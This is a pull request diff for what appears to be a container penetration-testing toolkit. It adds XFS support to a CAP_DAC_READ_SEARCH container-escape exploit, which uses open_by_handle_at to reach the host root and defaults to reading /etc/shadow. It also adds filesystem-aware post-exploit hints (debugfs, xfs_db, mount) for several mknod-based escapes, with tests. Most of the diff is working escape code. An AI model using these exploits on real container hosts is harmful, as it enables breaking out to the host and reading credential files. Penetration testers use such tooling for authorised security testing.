### PR TITLE
fix(exp): improve xfs exploit support

### DIFF
--- a/pkg/exploit/escaping/block_device_hint.go
+++ b/pkg/exploit/escaping/block_device_hint.go
@@ -1,0 +1,61 @@
+package escaping
+
+import (
+	"fmt"
+	"os/exec"
+	"strings"
+)
+
+type toolLookupFunc func(string) bool
+
+func runtimeBlockDeviceBrowseHint(fsType, devicePath string) string {
+	return blockDeviceBrowseHint(fsType, devicePath, toolExists)
+}
+
+func blockDeviceBrowseHint(fsType, devicePath string, hasTool toolLookupFunc) string {
+	fsType = strings.ToLower(fsType)
+	mountHint := blockDeviceMountHint(fsType, devicePath)
+
+	preferredToolHint := ""
+	switch fsType {
+	case "ext2", "ext3", "ext4":
+		if hasTool("debugfs") {
+			preferredToolHint = fmt.Sprintf("run 'debugfs -w %s' to browse host files", devicePath)
+		}
+	case "xfs":
+		if hasTool("xfs_db") {
+			preferredToolHint = fmt.Sprintf("use 'xfs_db -x -c \"inode 128\" -c \"ls\" %s' to inspect the host filesystem", devicePath)
+		}
+	}
+
+	if preferredToolHint != "" {
+		if hasTool("mount") {
+			return fmt.Sprintf("now, %s. If that tool is inconvenient, try '%s'.", preferredToolHint, mountHint)
+		}
+		return fmt.Sprintf("now, %s.", preferredToolHint)
+	}
+
+	if hasTool("mount") {
+		if fsType != "" {
+			return fmt.Sprintf("now, host filesystem type is %q. Try '%s' to inspect it.", fsType, mountHint)
+		}
+		return fmt.Sprintf("now, try '%s' to inspect the host filesystem.", mountHint)
+	}
+
+	if fsType != "" {
+		return fmt.Sprintf("host filesystem type is %q. A block device was created at %s; inspect it with tooling available in the container.", fsType, devicePath)
+	}
+	return fmt.Sprintf("a block device was created at %s; inspect it with tooling available in the container.", devicePath)
+}
+
+func blockDeviceMountHint(fsType, devicePath string) string {
+	if fsType != "" {
+		return fmt.Sprintf("mkdir -p /tmp/cdkmnt && mount -t %s -o ro %s /tmp/cdkmnt", fsType, devicePath)
+	}
+	return fmt.Sprintf("mkdir -p /tmp/cdkmnt && mount -o ro %s /tmp/cdkmnt", devicePath)
+}
+
+func toolExists(name string) bool {
+	_, err := exec.LookPath(name)
+	return err == nil
+}

--- a/pkg/exploit/escaping/block_device_hint_exploit_test.go
+++ b/pkg/exploit/escaping/block_device_hint_exploit_test.go
@@ -1,0 +1,83 @@
+package escaping
+
+import (
+	"strings"
+	"testing"
+)
+
+func TestExploitSpecificBlockDeviceHints(t *testing.T) {
+	tests := []struct {
+		name     string
+		fsType   string
+		device   string
+		expected []string
+	}{
+		{
+			name:   "rewrite cgroup devices ext4",
+			fsType: "ext4",
+			device: "cdk_mknod_result",
+			expected: []string{
+				"debugfs -w cdk_mknod_result",
+				"mount -t ext4 -o ro cdk_mknod_result /tmp/cdkmnt",
+			},
+		},
+		{
+			name:   "rewrite cgroup devices xfs",
+			fsType: "xfs",
+			device: "cdk_mknod_result",
+			expected: []string{
+				`xfs_db -x -c "inode 128" -c "ls" cdk_mknod_result`,
+				"mount -t xfs -o ro cdk_mknod_result /tmp/cdkmnt",
+			},
+		},
+		{
+			name:   "lxcfs rw ext4",
+			fsType: "ext4",
+			device: "host_dev",
+			expected: []string{
+				"debugfs -w host_dev",
+				"mount -t ext4 -o ro host_dev /tmp/cdkmnt",
+			},
+		},
+		{
+			name:   "lxcfs rw xfs",
+			fsType: "xfs",
+			device: "host_dev",
+			expected: []string{
+				`xfs_db -x -c "inode 128" -c "ls" host_dev`,
+				"mount -t xfs -o ro host_dev /tmp/cdkmnt",
+			},
+		},
+		{
+			name:   "cgroup2 ebpf bypass ext4",
+			fsType: "ext4",
+			device: "./cdk_mknod_v2_result",
+			expected: []string{
+				"debugfs -w ./cdk_mknod_v2_result",
+				"mount -t ext4 -o ro ./cdk_mknod_v2_result /tmp/cdkmnt",
+			},
+		},
+		{
+			name:   "cgroup2 ebpf bypass xfs",
+			fsType: "xfs",
+			device: "./cdk_mknod_v2_result",
+			expected: []string{
+				`xfs_db -x -c "inode 128" -c "ls" ./cdk_mknod_v2_result`,
+				"mount -t xfs -o ro ./cdk_mknod_v2_result /tmp/cdkmnt",
+			},
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			got := blockDeviceBrowseHint(tt.fsType, tt.device, func(name string) bool {
+				return name == "debugfs" || name == "xfs_db" || name == "mount"
+			})
+			for _, want := range tt.expected {
+				if !strings.Contains(got, want) {
+					t.Fatalf("blockDeviceBrowseHint(%q, %q) = %q, want substring %q", tt.fsType, tt.device, got, want)
+				}
+			}
+		})
+	}
+}

--- a/pkg/exploit/escaping/block_device_hint_test.go
+++ b/pkg/exploit/escaping/block_device_hint_test.go
@@ -1,0 +1,95 @@
+package escaping
+
+import (
+	"strings"
+	"testing"
+)
+
+func TestBlockDeviceBrowseHint(t *testing.T) {
+	tests := []struct {
+		name     string
+		fsType   string
+		tools    map[string]bool
+		expected []string
+	}{
+		{
+			name:   "ext4 prefers debugfs when available",
+			fsType: "ext4",
+			tools: map[string]bool{
+				"debugfs": true,
+				"mount":   true,
+			},
+			expected: []string{
+				"debugfs -w ./device",
+				"mount -t ext4 -o ro ./device /tmp/cdkmnt",
+			},
+		},
+		{
+			name:   "ext4 falls back to mount",
+			fsType: "ext4",
+			tools: map[string]bool{
+				"mount": true,
+			},
+			expected: []string{
+				`host filesystem type is "ext4"`,
+				"mount -t ext4 -o ro ./device /tmp/cdkmnt",
+			},
+		},
+		{
+			name:   "xfs prefers xfs_db when available",
+			fsType: "xfs",
+			tools: map[string]bool{
+				"xfs_db": true,
+				"mount":  true,
+			},
+			expected: []string{
+				`xfs_db -x -c "inode 128" -c "ls" ./device`,
+				"mount -t xfs -o ro ./device /tmp/cdkmnt",
+			},
+		},
+		{
+			name:   "xfs falls back to mount",
+			fsType: "xfs",
+			tools: map[string]bool{
+				"mount": true,
+			},
+			expected: []string{
+				`host filesystem type is "xfs"`,
+				"mount -t xfs -o ro ./device /tmp/cdkmnt",
+			},
+		},
+		{
+			name:   "unknown fs uses mount when available",
+			fsType: "btrfs",
+			tools: map[string]bool{
+				"mount": true,
+			},
+			expected: []string{
+				`host filesystem type is "btrfs"`,
+				"mount -t btrfs -o ro ./device /tmp/cdkmnt",
+			},
+		},
+		{
+			name:   "no tools falls back to generic message",
+			fsType: "xfs",
+			tools:  map[string]bool{},
+			expected: []string{
+				`host filesystem type is "xfs"`,
+				`A block device was created at ./device`,
+			},
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			got := blockDeviceBrowseHint(tt.fsType, "./device", func(name string) bool {
+				return tt.tools[name]
+			})
+			for _, want := range tt.expected {
+				if !strings.Contains(got, want) {
+					t.Fatalf("blockDeviceBrowseHint(%q) = %q, want substring %q", tt.fsType, got, want)
+				}
+			}
+		})
+	}
+}

--- a/pkg/exploit/escaping/cap_dac_read_search.go
+++ b/pkg/exploit/escaping/cap_dac_read_search.go
@@ -36,9 +36,11 @@ import (
 )
 
 const (
-	defaultRef    = "/etc/hostname"
-	defaultTarget = "/etc/shadow"
-	defaultShell  = "/bin/bash"
+	defaultRef     = "/etc/hostname"
+	defaultTarget  = "/etc/shadow"
+	defaultShell   = "/bin/bash"
+	ext4SuperMagic = 0xEF53
+	xfsSuperMagic  = 0x58465342
 )
 
 // plugin interface
@@ -111,6 +113,28 @@ func execCommand(cmdSlice []string) {
 	}
 }
 
+func rootFileHandle(ref string) (unix.FileHandle, error) {
+	var stat unix.Statfs_t
+	if err := unix.Statfs(ref, &stat); err != nil {
+		return unix.FileHandle{}, fmt.Errorf("statfs %s: %w", ref, err)
+	}
+
+	return rootFileHandleForFsType(int64(stat.Type))
+}
+
+func rootFileHandleForFsType(fsType int64) (unix.FileHandle, error) {
+	switch fsType {
+	case ext4SuperMagic:
+		// inode of / is always 2 for ext4, and i_generation is always 0.
+		return unix.NewFileHandle(1, []byte{0x02, 0, 0, 0, 0, 0, 0, 0}), nil
+	case xfsSuperMagic:
+		// The XFS root inode is 128; its export handle is a 12-byte fid.
+		return unix.NewFileHandle(129, []byte{0x80, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}), nil
+	default:
+		return unix.FileHandle{}, fmt.Errorf("unsupported filesystem type 0x%x", uint64(fsType))
+	}
+}
+
 func CapDacReadSearchExploit(target, ref string, chroot bool, cmd []string) error {
 	// reference something bind mounted to container from host
 	fd, err := unix.Open(ref, unix.O_RDONLY, 0)
@@ -118,9 +142,10 @@ func CapDacReadSearchExploit(target, ref string, chroot bool, cmd []string) erro
 		log.Fatalf("[-] Open: %v\n", err)
 	}
 
-	// inode of / is always 2 for ext4: https://ext4.wiki.kernel.org/index.php/Ext4_Disk_Layout
-	// and i_generation is always 0, so handle is always 0x0000000000000002
-	h := unix.NewFileHandle(1, []byte{0x02, 0, 0, 0, 0, 0, 0, 0})
+	h, err := rootFileHandle(ref)
+	if err != nil {
+		log.Fatalf("[-] Resolve root handle: %v\n", err)
+	}
 
 	fd, err = unix.OpenByHandleAt(fd, h, 0)
 	if err != nil {

--- a/pkg/exploit/escaping/cap_dac_read_search_test.go
+++ b/pkg/exploit/escaping/cap_dac_read_search_test.go
@@ -47,3 +47,47 @@ func TestWriteString(t *testing.T) {
 	fmt.Println(exploit.Desc())
 
 }
+
+func TestRootFileHandle(t *testing.T) {
+	tests := []struct {
+		name       string
+		fsType     int64
+		handleType int32
+		handle     []byte
+	}{
+		{
+			name:       "ext4",
+			fsType:     ext4SuperMagic,
+			handleType: 1,
+			handle:     []byte{0x02, 0, 0, 0, 0, 0, 0, 0},
+		},
+		{
+			name:       "xfs",
+			fsType:     xfsSuperMagic,
+			handleType: 129,
+			handle:     []byte{0x80, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0},
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			h, err := rootFileHandleForFsType(tt.fsType)
+			if err != nil {
+				t.Fatalf("rootFileHandleForFsType(%#x): %v", tt.fsType, err)
+			}
+
+			if h.Type() != tt.handleType {
+				t.Fatalf("handle type = %d, want %d", h.Type(), tt.handleType)
+			}
+			if got := h.Bytes(); string(got) != string(tt.handle) {
+				t.Fatalf("handle bytes = %v, want %v", got, tt.handle)
+			}
+		})
+	}
+}
+
+func TestRootFileHandleForFsTypeUnsupported(t *testing.T) {
+	if _, err := rootFileHandleForFsType(0x12345678); err == nil {
+		t.Fatal("expected unsupported filesystem error")
+	}
+}

--- a/pkg/exploit/escaping/cgroup2_ebpf_bypass.go
+++ b/pkg/exploit/escaping/cgroup2_ebpf_bypass.go
@@ -181,7 +181,7 @@ func (p cgroup2EbpfBypassS) Run() bool {
 				return false
 			} else {
 				log.Println("Exploit success! Device node created at './cdk_mknod_v2_result'")
-				log.Println("Run 'debugfs -w ./cdk_mknod_v2_result' to browse host files.")
+				log.Println(runtimeBlockDeviceBrowseHint(mi.Fstype, "./cdk_mknod_v2_result"))
 				return true
 			}
 		}

--- a/pkg/exploit/escaping/lxcfs_rw_mknod.go
+++ b/pkg/exploit/escaping/lxcfs_rw_mknod.go
@@ -86,6 +86,7 @@ func ExploitLXCFS() bool {
 	var podCgroupPath string
 	var devicesAllowPath, devicesListPath string
 	var deviceMarjor, deviceMinor string
+	var deviceFsType string
 	var filterString string
 
 	mountInfos, err := util.GetMountInfo()
@@ -116,6 +117,7 @@ func ExploitLXCFS() bool {
 		if util.FindTargetDeviceID(&mi) {
 			deviceMarjor = mi.Major
 			deviceMinor = mi.Minor
+			deviceFsType = mi.Fstype
 		}
 	}
 
@@ -141,22 +143,10 @@ func ExploitLXCFS() bool {
 			log.Printf("mknod err: %v", err)
 			return false
 		}
-		log.Printf("exploit success, run \"debugfs -w host_dev\".")
-		if !CheckDebugfs() {
-			log.Printf("if debugfs can not used, may be you can try to run `./cdk run lxcfs-rw-cgroup 'shell-cmd-payloads`")
-		}
+		log.Printf("exploit success, %s", runtimeBlockDeviceBrowseHint(deviceFsType, "host_dev"))
 		return true
 	}
 	return false
-}
-
-// CheckDebugfs check if debugfs is installed
-func CheckDebugfs() bool {
-	_, err := os.Stat("/usr/bin/debugfs")
-	if err != nil {
-		return false
-	}
-	return true
 }
 
 type lxcfsRWS struct{ base.BaseExploit }

--- a/pkg/exploit/escaping/rewrite_cgroup_devices.go
+++ b/pkg/exploit/escaping/rewrite_cgroup_devices.go
@@ -151,7 +151,7 @@ func (p cgroupDevicesExploitS) Run() bool {
 				return false
 			} else {
 				// escape done~
-				log.Println("now, run 'debugfs -w cdk_mknod_result' to browse host files.")
+				log.Println(runtimeBlockDeviceBrowseHint(mi.Fstype, "cdk_mknod_result"))
 				return true
 			}
 		}


### PR DESCRIPTION
## Summary

This PR improves exploit behavior on XFS-backed hosts and makes block-device follow-up guidance filesystem-aware.

## Changes

  - add XFS support to `cap-dac-read-search`
  - improve post-exploit hints for:
    - `rewrite-cgroup-devices`
    - `lxcfs-rw`
    - `cgroup2-ebpf-bypass`
  - prefer fs-specific tools when available and fall back to `mount -t <fstype> -o ro`

Docs note: the wiki pages for `cap-dac-read-search`, `rewrite-cgroup-devices`, `lxcfs-rw`, and `cgroup2-ebpf-bypass` should be updated to reflect XFS support and filesystem-aware follow-up hints.